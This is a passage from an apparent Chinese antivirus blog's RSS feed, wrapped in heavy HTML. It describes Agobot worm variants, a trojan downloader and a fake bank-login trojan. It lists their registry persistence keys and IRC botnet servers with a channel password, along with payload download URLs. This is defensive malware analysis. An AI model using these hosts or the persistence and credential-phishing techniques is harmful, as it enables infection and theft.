style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><div>1、病毒运行后，将创建下列文件：<br />%SystemDir%\bmnss.exe, 257024字节<br />在注册表中添加下列启动项：<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&amp;quot;Critical Runtime Indexer&amp;quot; = bmnss.exe<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<br />&amp;quot;Critical Runtime Indexer&amp;quot; = bmnss.exe<br />[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&amp;quot;Critical Runtime Indexer&amp;quot; = bmnss.exe<br />[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<br />&amp;quot;Critical Runtime Indexer&amp;quot; = bmnss.exe<br />这样，在Windows启动时，病毒就可以自动执行。</div><div>&amp;nbsp;</div><div>2、利用多种系统漏洞进行传播。会扫描局域网内存在漏洞的计算机，发送大量数据包，可以造成局域网拥堵甚至瘫痪。<br />&amp;nbsp;<br />3、连接irc服务器64.33.201.123:6522，接收黑客命令。<br />botnet:<br />64.33.201.123:6522 nubbie<br />#oldone# oldboot</div></span></span></div></td></tr></tbody></table></span><div></div></span><div></div><span id="L0300E040361C72DF" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /><col style="WIDTH: 313px" width="313" /></colgroup><tbody><tr id="L0300E0C0391D53A2"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L0300E1003C1E34A5" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mousepad4.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L0300E1403F1F15E8" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader</span></span></td></tr><tr id="L030120404B22A654"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L030120804E23C6D7" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">newname4.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L030120C05124E79A" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanClicker</span></span></td></tr><tr id="L03016040542647DD"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L030160805727A860" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">keyboard4.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L030160C05A290923" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L0300E1C0421FF7AB" title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word">和以前描述过的<a href="http://daishuo.blogchina.com/4662155.html">keyboard2.exe</a>, <a href="http://daishuo.blogchina.com/4693828.html">keyboard3.exe</a>功能类似，是个变种。<br />keyboard4.exe是个木马下载器。<br />运行后，首先向一个网络asp脚本提交新增感染报告，提交形式如下：<br /><a href="http://www.nonameforthisdomain.com/teller2.asp?rnd">http://www.nonameforthisdomain.com/teller2.asp?rnd</a>=[随机数]<br />然后获得一个要下载程序的列表：<br /><a href="http://www.nonameforthisdomain.com/data.asp?rnd">http://www.nonameforthisdomain.com/data.asp?rnd</a>=[随机数]&amp;amp;antisp=1<br />当前下载列表的内容如下：<br /><a href="http://content.dollarrevenue.com/keyboard4.exe">http://content.dollarrevenue.com/keyboard4.exe</a>，就是keyboard4.exe本身<br /><a href="http://content.dollarrevenue.com/mousepad4.exe">http://content.dollarrevenue.com/mousepad4.exe</a>，一个广告点击程序，可能弹出广告窗口<br /><a href="http://content.dollarrevenue.com/newname4.exe">http://content.dollarrevenue.com/newname4.exe</a>，木马下载器</span></span></div></td></tr></tbody></table></span><div></div></span><div></div></span><div></div></td></tr></tbody></table></span>]]></description> 
<dc:subject><![CDATA[病毒反病毒]]></dc:subject> 
<dc:creator><![CDATA[daishuo]]></dc:creator> 
<dc:date>2006-03-24T12:32:49Z</dc:date> 
</item> 
<item rdf:about="http://daishuo.bokee.com/4693833.html"> 
<title><![CDATA[昨日病毒(2005.03.18)]]></title> 
<link>http://daishuo.bokee.com/4693833.html</link> 
<description><![CDATA[<div class="postText"><p><a title="Photo Sharing" href="http://blog.donews.com/daishuo/archive/2006/03/19/775267.aspx"><img height="360" alt="fake_icbc" src="http://static.flickr.com/42/114167858_c7bbc74fbf_o.png" width="500" border="0" /></a></p><p>上图是一个vb木马显示的窗口，该窗口背景图片是幅截图，就是xx网上银行的登录页面。木马监视当前用户窗口的标题文字，一旦发现用户正在使用IE浏览器登录此页面，立即关闭IE窗口，并弹出自己的虚假登录窗口，诱骗用户在木马窗口上输入卡号和密码。随即把截到的内容发送至病毒作者信箱。 </p></div>]]></description> 
<dc:subject><![CDATA[病毒反病毒]]></dc:subject> 
<dc:creator><![CDATA[daishuo]]></dc:creator> 
<dc:date>2006-03-19T18:43:09Z</dc:date> 
</item> 
<item rdf:about="http://daishuo.bokee.com/4693828.html"> 
<title><![CDATA[昨日病毒(2006.03.16-03.17)]]></title> 
<link>http://daishuo.bokee.com/4693828.html</link> 
<description><![CDATA[<span>&amp;nbsp; <table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 562px" width="562" /></col /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 41px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width="562"><div><strong><font face="Arial">昨日病毒</font></strong></div></td></tr><tr style="MIN-HEIGHT: 31px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 146px" width="146" /></col /><col style="WIDTH: 149px" width="149" /></col /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="146"><div><font face="Arial"><strong>统计时段</strong></font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="149"><div><font face="宋体"><div title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><font size="2"><span id="L0238050004700606" style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-3-16</span><span style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></span></font></div></font></div></td></tr></tbody></table></span><div></div></td></tr><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 555px" width="555" /></col /></colgroup><tbody><tr><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><div><strong><font face="Arial">病毒样本上报数排行</font></strong></div><div><strong><font face="Arial"></font></strong>&amp;nbsp;</div><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /></col /><col style="WIDTH: 165px" width="165" /></col /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 22px"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="229"><div align="center"><font face="Arial">样本文件名</font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="165"><div align="center"><font face="Arial">上报次数</font></div></td></tr></tbody></table></span><div></div></td></tr></tbody><tbody><tr id="L023806C006A80CC9"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /></col /><col style="WIDTH: 166px" width="166" /></col /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L0238074008E0140C" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">lup.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L023807800B181B8F" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">121</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L023807C00D502352"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /></col /><col style="WIDTH: 166px" width="166" /></col /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L023808400F882B95" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssvcc.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L0238088011C03418" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">96</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 118px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><div><font face="Arial"><strong>技术分析</strong></font></div><span><span id="L0238094013F83D5B" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></col /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /></col /><col style="WIDTH: 313px" width="313" /></col /></colgroup><tbody><tr id="L023809C01630471E"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L02380A0018685121" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">lup.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L02380A401AA05B64" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor.Win32.Agobot.agw (Kaspersky)</span></span></td></tr><tr id="L02380A801CD865E7"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L02380AC01F1070AA" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssvcc.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L02380B0021487BAD" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor.Win32.Agobot.agw (Kaspersky)</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L02380B8023808730" title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><div>高波蠕虫变种。和<a href="http://daishuo.blogchina.com/4662155.html"><font color="#0066ff">昨日病毒（3月13日）</font></a>中描述的样本功能几乎完全相同，只是应用了不同的加密压缩壳处理，生成的新变种。</div><div>1、mssvcc.exe运行后，将创建下列文件：<br />%SystemDir%\mssvcc.exe, 83387字节<br />在注册表中添加下列启动项：<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&amp;quot;msconfig38&amp;quot; = mssvcc.exe<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<br />&amp;quot;msconfig38&amp;quot; = mssvcc.exe<br />这样，在Windows启动时，病毒就可以自动执行。<br />&amp;nbsp;<br />2、利用多种系统漏洞进行传播。会扫描局域网内存在漏洞的计算机，发送大量数据包，可以造成局域网拥堵甚至瘫痪。<br />&amp;nbsp;<br />3、连接irc服务器newircd.slateit1703.info:8080，接收黑客命令。<br />&amp;nbsp;<br />4、lup.exe运行后，将创建下列文件：<br />%SystemDir%\mssecure.exe, 